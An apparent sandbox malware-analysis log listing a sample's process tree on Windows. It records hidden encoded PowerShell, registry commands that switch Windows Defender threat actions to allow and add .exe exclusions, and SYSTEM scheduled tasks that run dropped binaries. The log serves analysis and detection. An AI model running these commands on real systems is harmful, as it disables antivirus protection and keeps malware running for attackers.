C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\Ehlsplu.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\Ehlsplu.exe nh /site_id 754 /S1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 06:40:16 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\QDsgliQ.exe\" V8 /site_id 754 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cbBtQoNpOByPPTwrn"2⤵
-
-
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\QDsgliQ.exeC:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\QDsgliQ.exe V8 /site_id 754 /S1⤵
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\bipxWr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\mzjxLie.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qTJPyBJZsADsDDd"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qTJPyBJZsADsDDd"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\GtplMFg.xml" /RU "SYSTEM"2⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\aRYukxX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\rVhxGOd.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\ZGjesCD.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuwdXuKdRzG" /SC once /ST 03:56:36 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\apBmsbRX\VsCbUqq.exe\" U4 /S"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuwdXuKdRzG"2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\apBmsbRX\VsCbUqq.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\apBmsbRX\VsCbUqq.exe U4 /S1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Users\Admin\AppData\Roaming\jgsdgssC:\Users\Admin\AppData\Roaming\jgsdgss1⤵
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\OiRQGqF.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\OiRQGqF.exe nh /site_id 754 /S1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 13:30:44 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\DNnZcAy.exe\" V8 /site_id 754 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cbBtQoNpOByPPTwrn"2⤵
-
-
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\DNnZcAy.exeC:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\DNnZcAy.exe V8 /site_id 754 /S1⤵
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\FkLlHY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\NFeNwPl.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qTJPyBJZsADsDDd"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qTJPyBJZsADsDDd"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\NSDmzMI.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\YFfFZTe.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\FvbUmvv.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\MnkJpIH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\ipNvqDYh\ppBOOOa.exe"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\ipNvqDYh\ppBOOOa.exe" /S Rm2⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&4⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:325⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:645⤵
-
-
-
-
